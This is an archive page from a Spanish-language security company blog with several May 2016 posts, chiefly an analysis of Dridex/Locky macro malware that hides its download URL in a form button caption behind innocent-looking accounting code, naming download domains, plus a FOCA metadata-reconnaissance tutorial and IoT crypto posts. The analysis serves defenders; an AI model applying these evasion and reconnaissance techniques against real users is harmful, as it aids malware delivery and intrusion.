Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (y VI) Jorge Rivera jorge.rivera@11paths.com
30 de mayo de 2016
"Camufladas, no ofuscadas": Malware de macro… ¿creado en España?
El malware de macro nos acompaña desde hace más de 15 años. En principio, dada su propia naturaleza, sería difícil que nos sorprendieran con grandes novedades. Las macros que hemos analizado en esta ocasión no son técnicamente novedosas, pero sí consideramos que plantean una novedad en su fórmula. El camuflaje frente a la clásica ofuscación. Y resulta de lo más efectivo. El malware de macro está en plena forma. Si bien Microsoft ha mermado sus posibilidades cercando cada vez más la capacidad de que se ejecuten de forma automática (deshabilitándolas por defecto y dando la posibilidad a los administradores de bloquearlas por completo), los atacantes encuentran nuevas fórmulas para que las víctimas las lancen, principalmente a través de la ingeniería social. También podríamos pensar que después de 15 años, todo está inventado en el asunto de la detección por parte de los antivirus. En realidad, siguen teniendo problemas para discernir los documentos de Word o Excel que contienen malware malicioso, al menos (y sobre todo) en sus métodos "estáticos" (pasarelas de correo, que es por donde se difunden, normalmente). Para pasar desapercibidos, los atacantes suelen ofuscar su código. Ofuscar, en el sentido de que el código sea ilegible, puesto que las macros, escritas en VBA (Visual Basic Application), son "decompilables" (como ocurre con Java). Por tanto los analistas y programas pueden verlas y analizarlas a simple vista, cosa que los atacantes intentan dificultar con código ofuscado, imbricado, nombres de variables imposibles y bucles sin sentido. Macro ofuscada "tradicional" Microsoft detectó no hace mucho una fórmula interesante en unos creadores de macros maliciosas. Consideramos que estas macros camufladas, no ofuscadas, son también interesantes en sí mismas por varias razones. Ofuscación… sí, pero no donde siempre En realidad, estas nuevas macros maliciosas sí utilizan cierta ofuscación. En concreto, la URL de descarga del ejecutable que lanzarán (otras macros contienen el ejecutable en formato "plano" y lo construyen al vuelo). Esta URL es habitual ofuscarla lo máximo posible y situar la cadena resultante en algún punto del código. Pero este atacante lo ha alojado en un sitio que pocos esperan. El "caption" de un botón de un formulario. La macro no tiene por qué mostrar ese formulario en ningún momento (de hecho no lo hace) pero sin embargo es un lugar donde pocos antivirus mirarán. Un par de imágenes con dos ejemplos diferentes lo aclaran: Ejemplos de cómo se almacena en el caption de un Label o botón, una cadena ofuscada que contiene ejecutables Esta es la cadena y parte del código que la irá "desofuscando". Tan bien escondido que se encuentra a simple vista Otra fórmula interesante es que sería difícil que viendo el código, esta macro se tomara por malware. Cuando un analista observa código ofuscado, entiende directamente que es malware y su trabajo consistirá en desenredar la ofuscación e intentar entender qué hace el código. Lo interesante de este malware de macro es que, mirando el código, muy pocos lo tomarían como malicioso. El código es normal, simula un acceso a base de datos, una especie de sistema de contabilidad incrustado en un documento que accede a una base de datos por ODBC, con sus nombres de tablas, sus controles de calidad, sus comentarios en español, sus conversores. Todo tan normal, que nadie sospecharía. Sin embargo, las funciones con nombres inocentes esconden el comportamiento malicioso. Algunos trozos de código. Solo en tiempo de ejecución se observa qué valor puede tomar cada variable Poco a poco, pasa por algunas de estas funciones (no todas) y va desofuscando la cadena que almacenaba en el caption del botón, descarga el fichero, y lo ejecuta. Y así, curiosamente, el atacante consigue más que solo ofuscando, puesto que el analista ni siquiera cree que deba desofuscar el código, puesto que es tan "normal" que nadie sospecharía. Es como si en lugar de ofuscarla e intentar esconderse, se mostrara completamente normal y natural, actuando tan a la vista que sería difícil tomar su comportamiento como sospechoso. ¿Código "normal", robado, o creado para la ocasión? Otra interesante curiosidad es el código usado. Podríamos pensar que para conseguir este camuflaje, bastaría con "robar" código legítimo de cualquier sitio de Internet y retocarlo. Pero el atacante no lo hace así siempre. Buena parte del código de varias muestras está en castellano, la mayoría. Las funciones no se encuentran en la red (Github o código de ejemplo). Caben dos posibilidades: O bien el código ha sido creado para la ocasión; O bien el código ha sido robado de una empresa que no lo ha publicado en la red en ningún momento. Optamos por esto último, pero es complicado saberlo. Para otras muestras, por ejemplo, sí que ha tomado código prestado de repositorios github públicos creados por hispanohablantes. Llama la atención igualmente los dominios usados para descargar los ejecutables. Muchos son españoles, probablemente comprometidos. ¿Se podría tratar de malware de macro "made in Spain"? Algunos dominios aparentemente españoles utilizados para su descarga son: navasdetolosa.com/, rproducciones.com, clickcomunicacion.es, centroinfantilelmolino.com, aunque también las hay polacas o inglesas como: www.paslanmazmobilya.org, isgim.com, love2design.co.uk, no-id.eu... Tráfico tras abrir algunas de las muestras Creemos, sin embargo que no son españoles. Veamos por qué. Código que trata la cadena de ejecución, y otro para despistar abajo, que "carga imágenes de ayuda" Pequeños errores No olvidemos que el sistema de macros es una vía de difusión, no un fin en este caso. El malware sigue siendo un ejecutable alojado en un servidor. En este caso, y desde que lleva actuando (febrero de 2016) ha utilizado campañas de Dridex y Locky. Estos son malware típicamente rusos, y trabajados como para que no sean detectados a la primera. Puede que el creador de la macro poco tenga que ver con el ejecutable y se limite a ejecutar una parte de la pirámide profesional de distribución… pero apostaríamos a que están relacionados. En cualquier caso, las macros también han pasado bastante desapercibidas desde que salieron en marzo. De hecho, de tres detecciones en marzo, han pasado a 36, una vez dada la voz de alarma. Un posible error que cometen los creadores es que la ventana de comandos en la que se lanza el ejecutable se ve por la víctima. Sería muy fácil ocultarla con un flag, y no lo ha hecho. Además muestra un humor un poco macabro. Las variables en las que va creando la llamada que ejecutará el malware, se llaman "problems". Momento de la ejecución, "camuflado" en una función aparentemente normal Otro error de lo más curioso y que nos lleva a pensar que a pesar de parecer españoles son rusos, es que no ha podido resistir dejar ciertas "singularidades" en el código. El más llamativo es el uso en el código de un nombre de un grupo de música nada popular y poco común llamado KABARE DUET AKADEMIA. Solo se les conoce una canción que aparece en un recopilatorio. Parte del código que habla de un grupo de música ruso poco conocido En otra muestra, utiliza una palabra poco común o escrita con errores (POLODSKA), que parece rusa igualmente, así como los nombres elegidos para algunos de los binarios descargados. Sergio de los Santos ssantos@11paths.com @ssantosv
23 de mayo de 2016
Sinfonier Contest 2015: Sinfonier y Smart Cities
Las ciudades hoy en día generan una gran cantidad de información que puede resultar muy útil, algunos ejemplos son los niveles de contaminación del aire, que devuelven las sondas colocadas en diferentes puntos geográficos o la situación de nuestras carreteras, para saber si tenemos mucha afluencia de coches o ha ocurrido algún accidente. Estos datos ya están siendo usados, pero de manera independiente. En la solución que he propuesto se basa en la ingesta de diferentes fuentes de información abiertas que están relacionadas de alguna manera y pueden relacionarse para sacar inferir resultados o recomendaciones que de otra manera serían imposibles. ¿De dónde podemos sacar esta información? Buscando en diferentes lugares de datos abiertos, me he encontrado con que algunas comunidades autónomas tienen su sitio web de open data: Documentación de la API de Zaragoza: http://www.zaragoza.es/docs-api/#/ Portal de datos abiertos de Santander: http://datos.santander.es/ Portal de datos abiertos de Barcelona: http://opendata.bcn.cat/opendata/es/ Portal de datos abiertos de Madrid: http://datos.madrid.es/portal/site/egob Cualquiera puede descargarse los datos que quiera dentro de un catálogo. Inicialmente, iba a realizarlo a partir de los datos de la Comunidad de Madrid pero todo lo que encontré fueron datos muy separados en el tiempo, habitualmente con actualización anual o registro de datos de eventos pasados. Por todo ello, elegí mi ciudad, Zaragoza, donde se desarrolló la siguiente API para los datos de los que disponían: Vemos que tiene un catálogo (http://www.zaragoza.es/api/catalogo.json) bastante extenso, por lo que elegí diferentes fuentes de información y preparé los módulos en Sinfonier para poder extraer los datos que me interesaban: Para recoger los datos, generé módulos spouts con los siguientes parámetros de entrada: Frecuency: Segundos que va a esperar el módulo en realizar de nuevo la petición, dando respuesta solo cuando aparezcan nuevos. Rows: Límite de valores que quiero que me devuelva el módulo. Start_date: Fecha inicial desde la cual se devolverán resultados en formato yyyy-mm-ddThh:mm:ssZ (UTC). Sort: Orden de las respuestas por parte del módulo (asc/desc). Q: Consulta mediante FIQL (http://tools.ietf.org/pdf/draft-nottingham-atompub-fiql-00.pdf) para permitir filtros y condiciones en las consultas utilizando una sintaxis con URIs amigables. Más información en: https://www.zaragoza.es/ciudad/risp/ayuda-api.htm#PrametrosAPI. Estos módulos hacen la petición correspondiente con los parámetros configurados. Una vez tenemos estos valores, ¿cómo los podemos relacionar? Una opción es a partir del punto geográfico que puede aparecer en las respuestas, esto nos dará el punto de unión entre las diferentes fuentes de información. Dentro de la topología, los valores que llegan se conectan con la entrada de otros, con los parámetros de latitud y longitud para así tener resultados solo en esos puntos. Una vez tengo esa información necesito guardarla en algún lugar para después poder consumirla. En este caso, utilice una base de datos orientada a grafos, ya que me permite fácilmente tener esas relaciones almacenadas. Utilicé como base de datos una Neo4j (http://neo4j.com/), la cual tiene ya módulos implementados que desarrollé tiempo atrás y permite la inserción de nodos y relaciones de manera única. Una vez hecho esto, conecto las salidas de los módulos con los de Neo4j y ya tendría la topología terminada. Un ejemplo de esta conexión sería la siguiente: Como resultado obtenemos lo siguiente: En el grafo podremos realizar las consultas para lograr las recomendaciones. Por ejemplo cuando queramos saber si la oferta de una habitación de un hotel es una buena oferta sin basarnos solo en las opiniones de las habitaciones, sino viendo si existen relaciones en ese lugar como quejas, accidentes de tráfico, etc. y poder mejorar nuestra información. Este es un ejemplo de una consulta que relaciona habitaciones de hotel con diversas quejas e incidentes. Esta topología se podría ir nutriendo de nuevas fuentes de información y buscando nuevos puntos de conexión entre ellas para generar mejores recomendaciones. También se pueden añadir más comunidades autónomas para lograr una comparación entre comunidades. Finalmente, quiero agradecer a Iñigo Serrano su colaboración a la hora de plantear la topología de este Sinfonier Contest. Migue l Hernández Boza Ganador de Sinfonier Contest 2015
19 de mayo de 2016
Seguridad criptográfica en IoT (III)
La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Seguimos avanzando en el estado del arte de las soluciones criptográficas para IoT. Cripto-Autenticación Dada la larga trayectoria de Atmel desarrollando elementos de seguridad con capacidades criptográficas, como módulos TPM, microcontroladores para SmartCards, aceleradores criptográficos, cripto-memorias, comparadores, etc. resulta natural que el ecosistema del IoT haya comenzado a integrar sus Crypto-Authenticators para añadir capacidades criptográficas. Estos disponen de tres diferentes variantes: SHA204A: autenticador simple basado en MAC/HMAC-SHA-256. AES132A: autenticador y cifrador basado en el algoritmo simétrico AES/CCM con claves de 128 bits. ECCx08A: autenticador y cifrador basado en el algoritmos asimétricos de curva elíptica ECDSA y ECDH, con claves de 256 bits. Sus características físicas son prácticamente idénticas y resultan por ello compatibles e intercambiables. La elección de uno u otro estará determinada por las necesidades del dispositivo que los albergue y aunque incorporan numerosas características de cierta complejidad, es posible utilizar sus funciones básicas de forma sencilla. Se pueden usar como elementos muy versátiles de seguridad criptográfica: desde la autenticación simple de un dispositivo, autenticación mutua o recíproca, negociación de claves de sesión para el cifrado íntegro de una comunicación, verificación de autenticidad de código o datos en un arranque seguro (SecureBoot) o actualización de firmware remota (OTA), etc. Todo esto por menos de 1 euro. Si cumplimos los requisitos del programa de "samples", Atmel envía muestras gratuitas sin coste alguno. Bus I2C Se producen en diferentes formatos de pequeño tamaño, todos ellos de montaje superficial. Aunque hay una versión de tan solo tres pines que utiliza un protocolo de comunicación SWI, que durante un tiempo fue comercializada por Sparkfun en una minúscula placa, lo habitual son los encapsulados de 8 pines, siendo el SOIC-8 el más manejable. Para las etapas de evaluación y test, es aconsejable utilizar un adaptador a DIP-8; los hay de diferentes tipos, incluido para los populares módulos de GROVE, e incluso puedes hacértelo tu mismo. Tan solo cuatro de sus pines están uso. Dos para su flexible alimentación, de ínfimo consumo, que puede variar de 2.0 a 5.5 voltios; dos para el bus I2C, lo que le permite conectar con microcontroladores como el popular Arduino, e incluso sistemas de escritorio y servidores mediante adaptadores, generalmente por USB. El bus I2C es un estándar de comunicación serie, muy utilizado por la industria para la interconexión de circuitos integrados. Usa dos líneas para transmitir la información: una línea de datos (SDA) y una línea de reloj (SCL), ambas con referencia a masa (GND). En sistemas como BeagleBone y Raspberry PI, el bus I2C es fácilmente accesible tanto físicamente al estar expuesto, como de forma lógica mediante las numerosas herramientas existentes en GNU/Linux. Si queremos utilizar un sistema convencional, ya sea Windows, Linux o Mac, que no disponga de un bus I2C accesible, lo más sencillo es utilizar un adaptador de USB a I2C. Los hay comerciales, aunque es posible fabricárselo uno mismo gracias al driver estándar i2c-tiny-usb, que permite en cualquier sistema utilizar un microcontrolador Atmel ATtiny 45/85 a modo de interface USB to I2C. Solo algunos valientes se atreverán a utilizar el bus I2C presente en el conector de las tarjetas de video, aunque técnicamente es posible. Sin llegar a disponer de la misma funcionalidad, también es posible utilizar un firmware que hace uso de la librería LUFA en cualquier microcontrolador de Atmel compatible, por ejemplo el ATmega32u4 del Arduino Leonardo, creando una interface " Serial to I2C", accesible desde Python por ejemplo. Con los adaptadores USB incluidos en los kits desarrollo oficiales de Atmel, se pueden utilizar las herramientas para Microsoft Windows que incluyen de forma gratuita. La comunicación en el bus I2C se realiza de forma "maestro-esclavo". El maestro inicia el diálogo, obteniendo repuesta de los esclavos que se identifican por su dirección I2C de 7 bits. Esta dirección viene determinada de fábrica, aunque muchos dispositivos incorporan mecanismos para modificarla, lo que permite conectar varios dispositivos iguales a un mismo bus I2C. Los sistemas "host" solo pueden ser maestros del bus I2C, siendo la mayoría de dispositivos I2C siempre esclavos. Algunos microcontroladores, por ejemplo los utilizados en Arduino, pueden ser programados para comportarse como maestros o como esclavos, aunque lo habitual es que actúen como maestros. Mediante el comando " i2cdetect" en Linux, o con un simple sketch en Arduino, se puede escanear el bus I2C para detectar los dispositivos esclavos conectados. En este ejemplo de escaneo, realizado tanto en Linux con un adaptador "i2c-tiny-usb", como en Arduino, se obtienen las direcciones I2C reales (en formato 7 bit) de los crypto-devices conectados al bus. Muchos fabricantes, Atmel incluido, suelen indicar en las especificaciones las direcciones I2C en formato de 8 bits, lo que suele dar lugar a ciertas confusiones. Seguiremos describiendo en la próxima entrada las librerías y el hardware disponible para practicar con la criptografía en IoT. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (y VI) Jorge Rivera jorge.rivera@11paths.com
18 de mayo de 2016
¿Y si el ransomware fuese legal?
Esta entrada pretende ser, más que un planteamiento sobre una posible evolución de este tipo de amenazas, un ejercicio de reflexión sobre la industria del adware y el malware, por qué se distinguen los términos, qué los diferencia y en qué nos afecta. ¿Qué pasaría si el ransomware fuese legal? Parece una pregunta absurda, ¿verdad? Más que preguntarnos sobre si un malware puede ser "legal" o no (algo que ya hemos decidido desde el momento en el que se usa la palabra "malware" para definirlo), habría que dar un paso atrás y mirar las raíces técnicas y legales, planteándose realmente qué es el malware, y qué significa ser "legal". Qué es malware Esta pregunta no es tan sencilla como parece. Desde el punto de vista técnico, el malware podría englobar cualquier programa que realiza algún daño en el sistema (control externo, obtención de información sensible, denegación de servicio….), o supone una amenaza potencial. Si nos ceñimos a esta definición técnica, ya existen múltiples programas que se utilizan a diario y permiten al menos alguna de estas situaciones: muchos programas necesarios y legítimos toman el control del sistema a un nivel total (arrancan al inicio, aceptan comandos de un servidor, registran movimientos, deciden qué se lanza o no en el sistema…). En malas manos o con fallos graves, "son una amenaza potencial"; muchos otros programas envían lo que se teclea a sus servidores "para mejorar la experiencia del usuario"; las extensiones del navegador, podrían robarnos toda la información (incluidas contraseñas) que tecleamos en la web y simular perfectamente un troyano bancario... ¿Por qué estos programas no son considerados malware? Porque no suelen materializar ese daño potencial, porque confiamos en la marca que lo respalda… pero técnicamente, no existiría una diferencia sustancial. Es como distinguir un cuchillo de cocina de un arma capaz de asesinar o descuartizar. Las capacidades técnicas, por tanto, a veces no son suficientes para definirlo. Así que se suele apelar a sus "circunstancias". Uno de los agravantes del malware es que se instala o actúa sin consentimiento o conocimiento explícito del usuario, por ejemplo a través de engaños, ingeniería social o algún exploit. Sin embargo, en el "goodware", la elección parece más consciente, y el hecho de desde un punto legal exista una empresa detrás que nos pida consentimiento para instalar el software, o nos informa de su actividad (a través de una letra minúscula que nadie lee) nos tranquiliza. Aceptamos unas reglas de juego (que no hemos leído en detalle) y operamos un tanto a ciegas a expensas de la buena fe del programador y empresa que lo respalda. Qué es adware La línea es delgada. Existe adware tan molesto como el malware. La percepción para el usuario es ralentización, pérdida de operatividad… Los creadores en este caso montan una empresa y piden al usuario que acepte unos términos de uso. Ya es "adware" legal. Esta es la razón por la que muchos ordenadores en el mundo parecen estar saturados de anuncios inoportunos o páginas de inicio secuestradas, y los antivirus no los detectan o no los pueden eliminar. Porque depende de su política interna, viciada en ocasiones por el número de veces que han podido ser demandados por bloquear el producto de una compañía, aunque este producto se financie a base de una insoportable publicidad (que alguien defina "insoportable"...). Esta es la razón también, por la que Google Play mantiene tantos programas en su market que son detectados por muchos antivirus, porque su concepto de "adware" es bastante elástico, y puede entrar en conflicto con el de los antivirus. Así, en ocasiones una imponente maquinaria legal respalda la distribución de algún software que, bajo un nombre llamativo, promete alguna mejora del sistema. Entre bambalinas, se están cediendo datos y consintiendo un bombardeo de anuncios constante, se realiza un cambio de buscador por defecto, se instala para arrancar al inicio, se roban datos personales, etc. El exploit o el engaño con el que el "malware" se suele instalar, se sustituye en el adware agresivo por una letra lo suficientemente pequeña o unos términos de uso lo bastante confusos o ausentes. Y algunos antivirus, a veces, tienen las manos atadas. ¿Dónde está la línea entre el adware legal o ilegal? Una de las guerras que libran las casas antivirus se se centra en lo que terminan por llamar "PUA", Potentially Unwanted Applications, porque son justamente eso: programas potencialmente no deseados, pero no pueden argumentar firmemente que sean malware. Otras veces, recurren a detectar el adware pero que su acción por defecto no sea limpiarlo del sistema o ponerlo en cuarentena, sino "Ignorar" la amenaza por considerarse de bajo riesgo. Así toman un camino intermedio. A veces, esta estrategia es su fórmula para que los abogados de creadores de adware no les envíen una carta amenazante… otras veces ni eso. Pensemos en cómo Android ha eliminado de su vocabulario la palabra "malware" y ha optado por utilizar siempre el término PHA para englobar todo tipo de amenazas en el móvil. Todo es cuestión del cristal con el que quiera mirarse. Ransomware legal Imaginemos pues, que el ransomware decide convertirse en un servicio en el que, para usarse, se deben aprobar unos términos de uso aparentemente legales. Hagamos un ejercicio de imaginación. Un ransomware cifra los archivos privados a cambio de una cantidad. Pensándolo fríamente, cifrar la información es positivo, previene el acceso a los ficheros en caso de pérdida del portátil o el dispositivo móvil (hacia donde es probable que se desplace el ransomware a medio plazo). Garantiza la privacidad si el sistema en compartido… Los usuarios que se preocupan por su seguridad cifran sus archivos importantes. Al igual que financiarse con publicidad, ¿qué tiene de malo? Pensemos que ese software que usamos para cifrar nuestros ficheros, simplemente no es gratuito. Que se sostiene gracias a la publicidad, o a una suscripción. Puede resultar una molestia, puede no ser ético… pero sería legal. Ahora, pensemos en que el ransomware se distribuye junto a otro tipo de software, o por sí mismo. Convence al usuario de las bondades de sus servicios, le obliga a aceptar unos términos y le pide tarjeta de crédito, bitcoins, etc… Sus ficheros quedan "protegidos", y podrá acceder a ellos siempre que pague mes a mes, diariamente por número de accesos, o solo cuando visite o haga clic sobre algunos anuncios. Una especie de cifrador "rogue" quizás basado en anuncios o por suscripción… un modelo similar en el que se juega con la credibilidad del usuario, se le da una capa de profesionalidad al malware, y se actúa sin complejos. Pero el software "rogue" ya se consideraría malware, por tanto, vayamos más allá. Llegamos al mundo donde se mueve el adware y las PUAs, imaginemos que los programadores de ransomware crean una empresa con el aparataje legal necesario para defender su producto, y poner en un compromiso a los antivirus. Porque la realidad es que la forma en que lo juzgue un antivirus será lo que marque la diferencia. Con solo conseguir que unos pocos lo califiquen como PUA, y otros ni se atrevan a eso por no poder hacer frente a posibles demandas… tendríamos ransomware legal… igual que ya disponemos de adware legal o grayware. CryptoWall dando la bienvenida a la víctima como si formase parte de una comunidad Conclusiones Si este planteamiento parece descabellado, probablemente es que lo es y nunca veamos nada parecido. Sin embargo, el ejercicio pretende llevar a una reflexión, sobre qué es malware, adware, PUA, goodware y la fina línea, desde luego no basada en criterios técnicos, que los separa. Incluso parece, que algunos ransomware han jugado con la idea de ofrecer un lustre de legalidad, profesionalidad o técnicas de mercadotecnia a sus ataques: pensemos en ransomware que usaba chats para interactuar con sus víctimas por si le surgían dudas durante el proceso de pago, los que dan la bienvenida al usuario a sus servicios, los que disponen de códigos QR para facilitar el pago, los que prometen donar el pago a caridad, etc. En resumen, al igual que no existe un consenso claro (al menos técnicamente hablando) sobre dónde acaba la agresividad del adware y esto lleva a un nuevo término llamado "grayware"... ¿podríamos llegar a un punto en el que existiese ransomware que se moviera en esa línea gris como modelo de negocio, caracterizada por su "bajo grado de peligrosidad"? (aunque sin duda molesto). Como siempre, solo si resulta más rentable que las actividades lucrativas actuales, se pondrá en marcha un modelo de este tipo. Sergio de los Santos ssantos@11paths.com @ssantosv
16 de mayo de 2016
Hoy Hablamos de Seguridad en Red en el ITW en Chicago
Participamos en la semana internacional de las Telecomunicaciones ( ITW) que se celebra en Chicago, con Pedro Pablo Pérez (VP de Productos y Servicios) en el panel: "THE PATH TO NETWORK SECURITY IN THE WHOLESALE WORLD". Hoy a las 04:00 PM de Chicago. Hoy en día los ciberataques dirigidos a las redes son una amenaza diaria y las empresas están invirtiendo fuertemente en tecnologías que eviten estos ataques pero, como todos sabemos la seguridad 100% no existe y los hackers parecen saltarse las barreras de seguridad. Esta sesión analizará los últimos problemas de seguridad en este ámbito y se discutirá cómo, nuestras capacidades como empresa de telecomunicaciones, nos permiten ir un paso por delante de los atacantes. Si quieres intervenir en temas como: ¿Cuáles son las posibles brechas en este ámbito, cuáles son las últimas amenazas graves y qué soluciones han demostrado ser más eficaces? Deberíamos requerir esfuerzos combinados y normas universales para proporcionar realmente la seguridad de extremo a extremo? ¿Cuál es la metodología y la dinámica de los atacantes en el ámbito de la red? La virtualización de red puede solventar los problemas de seguridad o crea amenazas mayores que antes? ITW es uno de los mayores congresos de telecomunicaciones del mundo. En su novena edición Pedro Pablo Pérez está como panelista. Esta tarde a las 4:00 PM (hora de Chicago), ¡no te lo pierdas!
10 de mayo de 2016
Today in the ITW (Chicago) we will be talking about Network Security
We are taking part in the International Telecoms Week that is going to take place in Chicago, where Pedro Pablo Pérez (Product and Services VP) will give a speech: "THE PATH TO NETWORK SECURITY IN THE WHOLESALE WORLD" this afternoon, at 4:00 p.m (Chicago time) Cyberattacks on networks have been a daily threat for years and carriers are investing heavily in solutions to avoid network downtime and to keep customers’ data safe. Yet, the threat persists. Hackers never seem short of new ways to breach security barriers. This session will look at the latest security issues, how carriers have been combating the attacks and will discuss how, if at all, carriers can stay one step ahead of attackers. It will also look at the wholesale world and the holes in protection that can occur when data is running over a number of different networks to reach the end-user. How quickly are the nature of attacks on networks changing and how easy or difficult is it to keep up with them? What are the latest severe threats and which solutions have proved most effective? Is Network Virtualisation solving security problems or creating greater threats than before? What consequences can be drawn from this? Is it enough for every carrier to do their own best, or does the wholesale world require combined efforts and universal standards to really provide end-to-end security? ITW is the world’s largest meeting for the global wholesale telecommunications community. In its 9th year, Pedro Pablo Pérez will give his speech. Don’t miss it out! This afternoon, at 4:00 p.m (Chicago time).
10 de mayo de 2016
Rastreando ubicaciones reales en los metadatos de las fotografías con FOCA
FOCA es una herramienta muy sencilla de utilizar que nos permite obtener, entre otras cosas, metadatos en documentos ofimáticos. Su funcionamiento consiste en utilizar buscadores que potencien los resultados de los archivos, por ejemplo Google y Bing, y conseguir obtener todos los archivos ofimáticos asociados a un dominio. Esto se puede llevar a cabo gracias a los dorks. Una vez encontramos los documentos ofimáticos asociados a un dominio, es decir, a una empresa que sea el target los podremos descargar masivamente y extraer de ellos los metadatos a su vez clasificándolos en diferentes subgrupos, entre los que podemos encontrar nombres de usuario del sistema, impresoras utilizadas, correos electrónicos, software utilizado, e incluso, el sistema operativo en el que fue creado el documento. Cómo usar FOCA en 4 sencillos pasos Comenzaremos por abrir el programa, una vez abierto crearemos un nuevo proyecto (clic en la opción “Project” -> “New Project”). Rellenaremos los campos de nombre, dominio y seleccionaremos una carpeta en la que guardar todos los documentos del proyecto (tras rellenar estos campos haremos clic en “Create”). Una vez creado el proyecto seleccionaremos los motores de búsqueda que queramos utilizar y el tipo de extensiones de los archivos en los que estemos interesados. Hecho esto ya estaremos listos para comenzar la recopilación de documentos (clicaremos en “Search All” y comenzaran a aparecer archivos en el panel derecho). Cuando haya finalizado la recopilación de documentos haremos clic derecho sobre cualquiera de ellos y seleccionaremos “Download All” (descargar todos), esto normalmente llevara un rato. Tras descargar todos los documentos volveremos a hacer clic derecho pero esta vez seleccionaremos “Extract All Metadata” (extraer todos los metadatos). Ahora que ya hemos extraído los metadatos solo tendremos que ir al panel superior izquierdo donde podremos observar un resumen de los metadatos obtenidos, los cuales podremos analizar individualmente si lo deseamos. También podemos utilizar FOCA para extraer metadatos de archivos que tengamos en nuestro ordenador, para esto solo tendremos que abrir el programa y arrastrar el archivo hasta él. Caso de Ejemplo: Fotos que engañan, metadatos que no Como ya sabréis hoy en día los Smartphones nos permiten hacer muchas cosas, entre ellas grabar videos, tomar fotos, compartir nuestra ubicación y mucho más. Estos Smartphones también guardan metadatos en los archivos ofimáticos que manejan (por ejemplo las fotografías en JPEG). Supongamos el caso ficticio de un sujeto acusado de haber cometido una serie de robos en Valencia. Frente a las acusaciones el sujeto proporciona su dispositivo móvil. En el se pueden obtener una serie de imágenes que, tras ser analizadas, muestran algo extraño. Son fotografías de Venecia, pero según sus metadatos la ubicación GPS marca Valencia. ¿Qué ha sido modificado? Él acusado indica en su coartada que estuvo en Venecia y que estuvo haciéndose fotografías en esta ciudad de Italia. ¿Pudo modificar la imagen y olvidar las coordenadas GPS? Él indica que estaba de viaje en Venecia mientras se cometieron los robos. Esta es una de las fotografías facilitadas por el acusado: Para comprobar su cuartada solo tendremos que seguir los siguientes pasos: Primero arrastraremos las fotos a la ventana de FOCA y extraeremos sus metadatos, hecho esto iremos al panel superior izquierdo para investigar un poco. Al investigar los metadatos de la fotografía podemos observar varias de las características del dispositivo con el que fue tomada la foto, ya sea el modelo, la marca, la fecha y hora, el programa de la cámara utilizado e incluso la ubicación exacta expresada en coordenadas. Con los datos obtenidos sabremos si el acusado tomo la foto en el lugar que dijo, si esta fue tomada por su dispositivo móvil y si la fecha en la que fue tomada corresponde a la de su supuesto viaje. Al introducir las coordenadas podemos observar el punto exacto en el que fue tomada la fotografía. Tras hacer esto nos damos cuenta de que el acusado nos ha entregado una prueba en su contra al intentar demostrar su inocencia. Esto es un caso ficticio, pero podría darse en la vida real. Descarga la FOCA desde nuestro sitio web y disfruta del potencial que la herramienta proporciona. Sergio Sancho Azcoitia 11Paths
9 de mayo de 2016
La Organización de los Estados Americanos (OEA) y Telefónica/Eleven Paths trabajan por la Ciberseguridad
Si todavía no lo sabes, en ElevenPaths somos socios estratégicos del CICTE (Comité Interamericano Contra el Terrorismo) en toda la región; Aquí participamos junto con organizaciones como el FBI, TERENA, CERT/CC, Enisa, FIRST, el Departamento de Estado de los EEUU y el Servicio Secreto, entre otros. Desde que nos unimos a esta asociación de empresas cuyo foco principal es la lucha del ciberterrorismo hemos participado en: - El “ Reporte de Seguridad Cibernética e Infraestructuras Críticas de las Américas”. - El “ Simposio Regional de Seguridad Cibernética” celebrado en Uruguay. - El “ 27Th Annual FIRST Conference on Computer Security Incident Handling” en Berlin. - “ La Octava Escuela del Sur de Gobernanza de Internet SSIG 2016” la cual se realizó en la sede de la OEA, en la ciudad de Washington DC. Si quieres más información puedes ver nuestros post: Nuestro paso por el SSIG 2016 (Parte 1) Nuestro paso por el SSIG 2016 (Parte 2) Hoy en día y entre otros temas, estamos trabajando con la OEA, en la posibilidad de apoyarlos en sus 35 estados miembros con: Cyber drills Awareness-raising initiatives Entrenamiento y simulacros Eventos sobre operaciones de seguridad específicas para el sector Ciberseguridad IoT Security ¿Qué es la Organización de los Estados Americanos? Empezando con un poquito de historia “…La Organización de los Estados Americanos es el organismo regional más antiguo del mundo, cuyo origen se remonta a la Primera Conferencia Internacional Americana, celebrada en Washington, D.C., de octubre de 1889 a abril de 1890. En esta reunión, se acordó crear la Unión Internacional de Repúblicas Americanas y se empezó a tejer una red de disposiciones e instituciones que llegaría a conocerse como “sistema interamericano”, el más antiguo sistema institucional internacional…” Actualmente la OEA congrega a los 35 Estados independientes de las Américas y constituye el principal foro gubernamental político, jurídico y social del hemisferio. Además, ha otorgado el estatus de Observador Permanente a 69 Estados, así como a la Unión Europea (UE). Dicho esto, es también importante mencionar que en la Asamblea General de la OEA en 2004, los Estados miembros aprobaron la Estrategia Interamericana Integral para combatir las Amenazas a la seguridad cibernética en la resolución AG/RES. 2004 (XXXIV-O/04), proporcionando así el mandato que permite a la Secretaría del CICTE (Comité Interamericano Contra el Terrorismo) trabajar en asuntos de Seguridad Cibernética. Nos alegra compartir con vosotros nuestra experiencia en la OEA. En próximos post estaremos informando de nuestra participación y apoyo a la OEA en toda la región. Hasta la próxima!!! Leandro Bennaton CSA – Chief Security Ambassador at ElevenPaths leandro.bennaton@11paths.com @bennaton Leonardo Huertas CSA – Chief Security Ambassador at ElevenPaths leonardo.huertas@11paths.com @samuraiblanco
6 de mayo de 2016
Seguridad criptográfica en IoT (II)
